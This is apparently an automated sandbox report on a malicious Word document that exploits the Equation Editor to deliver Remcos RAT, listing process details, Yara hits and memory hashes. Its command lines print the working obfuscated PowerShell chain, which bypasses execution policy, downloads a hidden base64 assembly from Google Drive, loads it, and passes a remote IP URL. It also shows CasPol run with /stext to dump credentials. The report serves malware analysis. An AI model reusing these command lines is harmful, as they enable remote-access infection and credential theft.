                                                                                                                                                                        2024-10-23 15:26:57 UTC1378INData Raw: e4 9e 58 dc c8 a1 d4 44 ad d4 72 c4 ee 2c 47 16 c2 bb 67 8a fb 55 10 93 ed ee 9b 50 24 0b 1c c9 a2 0a c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5 28 eb 21 60 ea 41 ef b7 a7 eb 93 02 ed 56 70 f2 1f cb fb 64 b9 67
                                                                                                                                                                        Data Ascii: XDr,GgUP$2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De(!`AVpdg

Target ID: 0
Start time: 11:26:06
Start date: 23/10/2024
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit): false
Commandline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase: 0x13f470000
File size: 1'423'704 bytes
MD5 hash: 9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 11:26:28
Start date: 23/10/2024
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase: 0x400000
File size: 543'304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 11:26:33
Start date: 23/10/2024
Path: C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\wennedgreatthingswithgoodnwesforentrie.hta"
Imagebase: 0xc0000
File size: 13'312 bytes
MD5 hash: ABDFC692D9FE43E2BA8FE6CB5A8CB95A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 11
Start time: 11:26:37
Start date: 23/10/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'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'+[cHAR]34+'))')))"
Imagebase: 0x1090000
File size: 427'008 bytes
MD5 hash: EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 11:26:39
Start date: 23/10/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe
Imagebase: 0x1090000
File size: 427'008 bytes
MD5 hash: EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 14
Start time: 11:26:42
Start date: 23/10/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline"
Imagebase: 0x800000
File size: 2'140'808 bytes
MD5 hash: F8F36858B9405FBE27377FD7E8FEC2F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 15
Start time: 11:26:43
Start date: 23/10/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8872.tmp" "c:\Users\user\AppData\Local\Temp\j0qjax5r\CSC3F30325724544FF3B51B1BF07A1EFBCB.TMP"
Imagebase: 0x820000
File size: 46'832 bytes
MD5 hash: 70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 16
Start time: 11:26:49
Start date: 23/10/2024
Path: C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS"
Imagebase: 0xf20000
File size: 141'824 bytes
MD5 hash: 979D74799EA6C8B8167869A68DF5204A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 17
Start time: 11:26:49
Start date: 23/10/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Imagebase: 0x1090000
File size: 427'008 bytes
MD5 hash: EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 19
Start time: 11:26:50
Start date: 23/10/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')"
                                                                                                                                                                        Imagebase:0x1090000
                                                                                                                                                                        File size:427'008 bytes
                                                                                                                                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:20
                                                                                                                                                                        Start time:11:27:20
                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                                                        Imagebase:0x1f0000
                                                                                                                                                                        File size:107'704 bytes
                                                                                                                                                                        MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:21
                                                                                                                                                                        Start time:11:27:25
                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux"
                                                                                                                                                                        Imagebase:0x1f0000
                                                                                                                                                                        File size:107'704 bytes
                                                                                                                                                                        MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:22
                                                                                                                                                                        Start time:11:27:25
                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux"
                                                                                                                                                                        Imagebase:0x1f0000
                                                                                                                                                                        File size:107'704 bytes
                                                                                                                                                                        MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:23
                                                                                                                                                                        Start time:11:27:25
                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\yycdupifp"
                                                                                                                                                                        Imagebase:0x1f0000
                                                                                                                                                                        File size:107'704 bytes
                                                                                                                                                                        MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:24
                                                                                                                                                                        Start time:11:27:25
                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\jsiovitzdbnf"
                                                                                                                                                                        Imagebase:0x1f0000
                                                                                                                                                                        File size:107'704 bytes
                                                                                                                                                                        MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

Memory Dump Source
• Source File: 00000008.00000002.415353153.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, Offset: 008DF000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_8df000_EQNEDT32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 47ab4dd8a6351217991f966a9fe75ac0cf419884157d4c6339a95da6cab63a57
• Instruction ID: 7cdda71cb56d0c6a3c40bf960755c6ceb4146317dbc5b532204139766040adef
• Opcode Fuzzy Hash: 47ab4dd8a6351217991f966a9fe75ac0cf419884157d4c6339a95da6cab63a57
• Instruction Fuzzy Hash: 3011AE524AFBD54FD3035B79A861090BFB4AD5725934B46D7C0C0CF1B3D66A080EC3A2
Memory Dump Source
• Source File: 00000009.00000003.429507818.00000000028C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_3_28c0000_mshta.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
• Instruction ID: 5b5d5254cf3d2e31a10b75c4f0f750729654c248d5628a78226064a576ea65de
• Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
• Instruction Fuzzy Hash:

Execution Graph

Execution Coverage: 7.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 17%
Total number of Nodes: 47
Total number of Limit Nodes: 7
Execution graph (first node 7543b0; API nodes call URLDownloadToFileW): rendered graph omitted

Control-flow Graph (function entry 754548, calls URLDownloadToFileW): rendered graph omitted
Memory Dump Source
• Source File: 0000000B.00000002.455127026.0000000000750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_750000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8e7e7f7bc72b9c2ea957a9131cecd4979679b9855fdb49089f5d51f3fd1fd7aa
• Instruction ID: 9ab2482d8b911788719c69200fa06a02baa0c09dd7ea6fbc45207cecad432f35
• Opcode Fuzzy Hash: 8e7e7f7bc72b9c2ea957a9131cecd4979679b9855fdb49089f5d51f3fd1fd7aa
• Instruction Fuzzy Hash: A2E11574A00219AFDB04DF98D884ADEBBF2FF89314F248559E804AB361C775ED95CB90

Control-flow Graph (function entry 754930, calls URLDownloadToFileW): rendered graph omitted
APIs
• URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 007549C9
Memory Dump Source
• Source File: 0000000B.00000002.455127026.0000000000750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_750000_powershell.jbxd
Similarity
• API ID: DownloadFile
• String ID:
• API String ID: 1407266417-0
• Opcode ID: fcf6ca19356dc21603af2e325bbc38cd225a55c1ae5fe255a1deff371b774943
• Instruction ID: 7ef03f5491492170221783d5fc9b1131b1bb2cdb2006368c44787b257805600c
• Opcode Fuzzy Hash: fcf6ca19356dc21603af2e325bbc38cd225a55c1ae5fe255a1deff371b774943
• Instruction Fuzzy Hash: AB21F4B1D006199FCB00CF9AD885ADEFBB5FF48314F10852AE818A7250D374AA54CFA1

Control-flow Graph (function entry 901770): rendered graph omitted
Memory Dump Source
• Source File: 0000000B.00000002.455187322.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_900000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d4f8ccd0c94bccea79b324751ed69ed613f9b62713d3b582e11d2e149f1dc40d
• Instruction ID: 049fee79d0c8ddf37717afc65e2ee3056e676985ff4a0b39598e31260abf9a4a
• Opcode Fuzzy Hash: d4f8ccd0c94bccea79b324751ed69ed613f9b62713d3b582e11d2e149f1dc40d
• Instruction Fuzzy Hash: C0F12634B002149FDB149FA8D440B6EBBE6FFC9710F24856AE815AB3A1DB71DD81CB91

Control-flow Graph (function entry 901754): rendered graph omitted
Memory Dump Source
• Source File: 0000000B.00000002.455187322.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_900000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f616c1521de4b6763871da482247f15dd6c458a0522b736270acb26a5d9c4572
• Instruction ID: 4c3cb7f52af4546104bac155b56d84db3d78ca498ea7b0afd73821080a60d2c1
• Opcode Fuzzy Hash: f616c1521de4b6763871da482247f15dd6c458a0522b736270acb26a5d9c4572
• Instruction Fuzzy Hash: D2919C34B00205DFDB24DF58D440BAAB7B6FF88710F25856AE914AB3A1DB71ED81CB90

Control-flow Graph (function entry 900998): rendered graph omitted
Memory Dump Source
• Source File: 0000000B.00000002.455187322.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_900000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 43d267b6e03f2bb984c48d6a13c7de0c246e8e7bf085df7ff8f4d63a878de8d5
• Instruction ID: 6dfffe28d44cfa03cf73273a69ea57b3cd9a287413a1de413f1cacf10a7a9e9c
• Opcode Fuzzy Hash: 43d267b6e03f2bb984c48d6a13c7de0c246e8e7bf085df7ff8f4d63a878de8d5
• Instruction Fuzzy Hash: A0514631B043149FDB209B688854B6ABBE5EFC5B10F24C06AE949DF3D2CA718D45C7A1

Control-flow Graph (function entry 900a7d): rendered graph omitted
Memory Dump Source
• Source File: 0000000B.00000002.455187322.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_900000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8d0b7de5eda71a9cf1cae8494efb552833ae8ccb569b4355d9e872674e144626
• Instruction ID: 833ca8aba4c9efc63d0db6e47a3ea0161b5c08a438050f5436c8927aeadd6949
• Opcode Fuzzy Hash: 8d0b7de5eda71a9cf1cae8494efb552833ae8ccb569b4355d9e872674e144626
• Instruction Fuzzy Hash: 0E0122247043842FD721626A4850BAB7FAAEFC2714F14C06AE989CB3D3D6619D849360

Control-flow Graph (function entry 26d01d): rendered graph omitted
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.454949667.000000000026D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0026D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_26d000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 604503960661181d716ec6895500d68c2c2d9c8e2bcbf989b448fc4dc9b411af
                                                                                                                                                                          • Instruction ID: 45b0142dce0ecab333de4a8091c5c6f9545865a404e2123f651090d29e4045a8
                                                                                                                                                                          • Opcode Fuzzy Hash: 604503960661181d716ec6895500d68c2c2d9c8e2bcbf989b448fc4dc9b411af
                                                                                                                                                                          • Instruction Fuzzy Hash: 2501F731A14348ABEB205E15C8C4767BB98DF81364F28C41AEC451B182D2799D85DAB1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.454949667.000000000026D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0026D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_26d000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5917b3dad6802c877c3ca37aa4c8b223844e26942317192302ca09137ff99794
                                                                                                                                                                          • Instruction ID: b1ae9ae2a060e42636355b1d0c98c0c3e7e7ae120bcfb921839c7f7fa8ca2cf6
                                                                                                                                                                          • Opcode Fuzzy Hash: 5917b3dad6802c877c3ca37aa4c8b223844e26942317192302ca09137ff99794
                                                                                                                                                                          • Instruction Fuzzy Hash: D3F0C271504244AFEB208E16CCC4BA3FBD8EB81738F18C45AED481E282C2799C84CAB0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.455187322.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_900000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$`$`
                                                                                                                                                                          • API String ID: 0-2632813216
                                                                                                                                                                          • Opcode ID: 9fb049c803eb6554f188921e87999171d49af8fc0bf83cf154f146108b4d046f
                                                                                                                                                                          • Instruction ID: ae81de0e08a93df473924fa268ce8041f29a04d50f853930f63487980f94c965
                                                                                                                                                                          • Opcode Fuzzy Hash: 9fb049c803eb6554f188921e87999171d49af8fc0bf83cf154f146108b4d046f
                                                                                                                                                                          • Instruction Fuzzy Hash: 10E12531B04248DFDF159A68C8507BE7BAAAFC1310F148476E9159B2E2DB74CD81CBA2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.455187322.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_900000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: (Fa$L4#p$L4#p$L4#p
                                                                                                                                                                          • API String ID: 0-1089117475
                                                                                                                                                                          • Opcode ID: 64fb57b6df9c365daff5613bd29bdca9c37336e160fd90db405c40cab7555bc6
                                                                                                                                                                          • Instruction ID: 3b007389965be73bf9b0a165e9772bde82b7d1ac6bbf5e3ecb54ccf478f95cb9
                                                                                                                                                                          • Opcode Fuzzy Hash: 64fb57b6df9c365daff5613bd29bdca9c37336e160fd90db405c40cab7555bc6
                                                                                                                                                                          • Instruction Fuzzy Hash: A0616330B002489FDB159F64C8507BE7BAAEFC1310F148176E9058B2D2DB79ED95CBA2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000011.00000002.587327950.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_17_2_1dd000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4b90767d278ab9ba6d65a9fbf5d802b0b852b34f13cf2dba7bb90446ccebdced
                                                                                                                                                                          • Instruction ID: 6c34360ea9998e3d6e6a8f75a56f525c90fa8105b8a0075e16caf1cbf44329a0
                                                                                                                                                                          • Opcode Fuzzy Hash: 4b90767d278ab9ba6d65a9fbf5d802b0b852b34f13cf2dba7bb90446ccebdced
                                                                                                                                                                          • Instruction Fuzzy Hash: 3301FD71104340ABEB209E25ECC4B67BB98EFC1324F28C41BFC490B382C3799945CAB1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000011.00000002.587327950.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_17_2_1dd000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c72cf08cf6822aa66ab767bd1c0b10c87b23991c93d67fe62758812ab8b19737
                                                                                                                                                                          • Instruction ID: aea16f87bffcf236503954fc1fbecbb1142280eefefd6d8cad2f6745b1337664
                                                                                                                                                                          • Opcode Fuzzy Hash: c72cf08cf6822aa66ab767bd1c0b10c87b23991c93d67fe62758812ab8b19737
                                                                                                                                                                          • Instruction Fuzzy Hash: 0701716140D3C09FD7128B259C94B52BFB4DF93228F19C1DBE8888F2A3C2699C48C772

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:6.8%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:61
                                                                                                                                                                          Total number of Limit Nodes:6
